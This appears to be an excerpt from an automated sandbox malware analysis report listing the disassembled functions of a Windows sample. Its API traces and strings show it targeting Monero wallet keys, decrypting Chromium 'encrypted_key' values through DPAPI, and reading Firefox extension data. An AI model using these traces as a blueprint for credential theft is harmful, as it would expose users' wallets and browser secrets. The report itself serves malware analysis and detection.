                                  • DeleteFileA.KERNEL32(00000000), ref: 0023D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c6a412fee9aafaecaaf0655fa78ee9854f00575e73355feeb8c8ba1de97d82ac
                                  • Instruction ID: 4d8d7a8a2a5c51ff83dcc76ef94a655c4a47341d5c089149918a122293d95301
                                  • Opcode Fuzzy Hash: c6a412fee9aafaecaaf0655fa78ee9854f00575e73355feeb8c8ba1de97d82ac
                                  • Instruction Fuzzy Hash: E39113728601089BEB0CFBA0DC92EEE7338EF54304F514568F507A6091EF346A69CF66
                                  Function 0023D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023D801
                                  • lstrlen.KERNEL32(00000000), ref: 0023D99F
                                  • lstrlen.KERNEL32(00000000), ref: 0023D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 3c3b2d18fe611926dd4c06a428a7cab772ed74a5900d95a9687d767e037e382d
                                  • Instruction ID: 3e478d0f64eb7ad0ceedc1abe4662a1bca3431b110acff430731df85930b9327
                                  • Opcode Fuzzy Hash: 3c3b2d18fe611926dd4c06a428a7cab772ed74a5900d95a9687d767e037e382d
                                  • Instruction Fuzzy Hash: 6D8101729701149BEB08FBA0DC96EEE7339EF54304F514528F407A6091EF346A69CF66
                                  Function 0023F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00251580,00250D92), ref: 0023F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0023F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: ba0ef2dd1a8a09cb1fec8c172fc4b12976aed9c255ad5a868c181b6ed3439efe
                                  • Instruction ID: 14ca25bbcfe5d099ef4c0679acfad678915c93eda2afc81a91c2839fde35acaa
                                  • Opcode Fuzzy Hash: ba0ef2dd1a8a09cb1fec8c172fc4b12976aed9c255ad5a868c181b6ed3439efe
                                  • Instruction Fuzzy Hash: D251F271D60108AAEB1CFBA4DC96DED7378EF54304F508528F81667191EE346A29CFA2
                                  Function 002470D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                  Download Yara Rule
                                  Strings
                                  • s$, xrefs: 00247111
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0024718C
                                  • s$, xrefs: 002472AE, 00247179, 0024717C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: s$$s$$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 3722407311-2095441424
                                  • Opcode ID: a6dc1a5d853e3a1da86c420f0899ee3d32f505c16c68e0d97fe2ebff1a4131b3
                                  • Instruction ID: 9b584d038e8d304aff445bca8aa6697dcbfc8bcee7d1e9bb67f323b906ea1b37
                                  • Opcode Fuzzy Hash: a6dc1a5d853e3a1da86c420f0899ee3d32f505c16c68e0d97fe2ebff1a4131b3
                                  • Instruction Fuzzy Hash: 33518DB0D642199FDB28EFA0DC82BEEB374AF44304F1041A8E51976181EB746E98CF59
                                  Function 00243560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: a996b4bd8269538f7623919f0de0bf648719d225caa8fbfc96db84ac05ab4e2e
                                  • Instruction ID: 54aaedba3149478c7dc702dbece9c2f1db805f30f2ca5db719e51dccaec6e31c
                                  • Opcode Fuzzy Hash: a996b4bd8269538f7623919f0de0bf648719d225caa8fbfc96db84ac05ab4e2e
                                  • Instruction Fuzzy Hash: 38414171D20109AFDB08EFE4DC85AEEB778AF54304F008418E41676291DB75AA29CFA6
                                  Function 00239CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00239D39
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                    • Part of subcall function 00239AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                    • Part of subcall function 00239AC0: LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                    • Part of subcall function 00239B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00239B84
                                    • Part of subcall function 00239B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00239BA3
                                    • Part of subcall function 00239B60: LocalFree.KERNEL32(?), ref: 00239BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 658aac05c99212bc8a921ddd780a9bb1fceeb04ac83c6c50613061798e2280c2
                                  • Instruction ID: e9c8a536becc9f21d4483827e0c896077b20ca2db76fb8c3ce1b20edcdd767eb
                                  • Opcode Fuzzy Hash: 658aac05c99212bc8a921ddd780a9bb1fceeb04ac83c6c50613061798e2280c2
                                  • Instruction Fuzzy Hash: 5F3181B6D2010DABCF04EFE4DC86AEFB7B8AF49704F144558E905A7241E7709A64CBA1
                                  Function 00248680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002505B7), ref: 002486CA
                                  • Process32First.KERNEL32(?,00000128), ref: 002486DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 002486F3
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • CloseHandle.KERNEL32(?), ref: 00248761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: ad9aec71a67441239370ef7175fffdcf19fd4053d32737fe1b3270d87380af59
                                  • Instruction ID: d8770f57af962b44c3c540b2230e34034442847acc44230e7d824b929078bc51
                                  • Opcode Fuzzy Hash: ad9aec71a67441239370ef7175fffdcf19fd4053d32737fe1b3270d87380af59
                                  • Instruction Fuzzy Hash: F1314D71961218ABDB28EF54CC95FEEB778FF45700F1041A9E50AA21A0DB306A55CFA1
                                  Function 00247980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00250E00,00000000,?), ref: 002479B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002479B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00250E00,00000000,?), ref: 002479C4
                                  • wsprintfA.USER32 ref: 002479F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 98875f6b379307ba82eebbf8ec4a38c5d878dfde67785ab2099f47db3a5376d4
                                  • Instruction ID: e3b7a44a621d89819cd50dd2a6451e5313c802914cec3ffc91af00949eeda088
                                  • Opcode Fuzzy Hash: 98875f6b379307ba82eebbf8ec4a38c5d878dfde67785ab2099f47db3a5376d4
                                  • Instruction Fuzzy Hash: 0A1127B2904118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3795950CBB5
                                  Function 0024C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0024C74E
                                    • Part of subcall function 0024BF9F: __amsg_exit.LIBCMT ref: 0024BFAF
                                  • __getptd.LIBCMT ref: 0024C765
                                  • __amsg_exit.LIBCMT ref: 0024C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0024C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 170a788a605a8a36beb0b38c90603a82581d9d9e277fed609ee1289e4223c374
                                  • Instruction ID: 77fea26fbc37bb7bb3b490894525810b3a981832ff2bd61c0c823bb7edf81c02
                                  • Opcode Fuzzy Hash: 170a788a605a8a36beb0b38c90603a82581d9d9e277fed609ee1289e4223c374
                                  • Instruction Fuzzy Hash: FEF024329367009BD76EBFBC580775E73A06F00721F314109F405A65D2DB7498708E5A
                                  Function 00244F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244F7A
                                  • lstrcat.KERNEL32(?,00251070), ref: 00244F97
                                  • lstrcat.KERNEL32(?,01048BA8), ref: 00244FAB
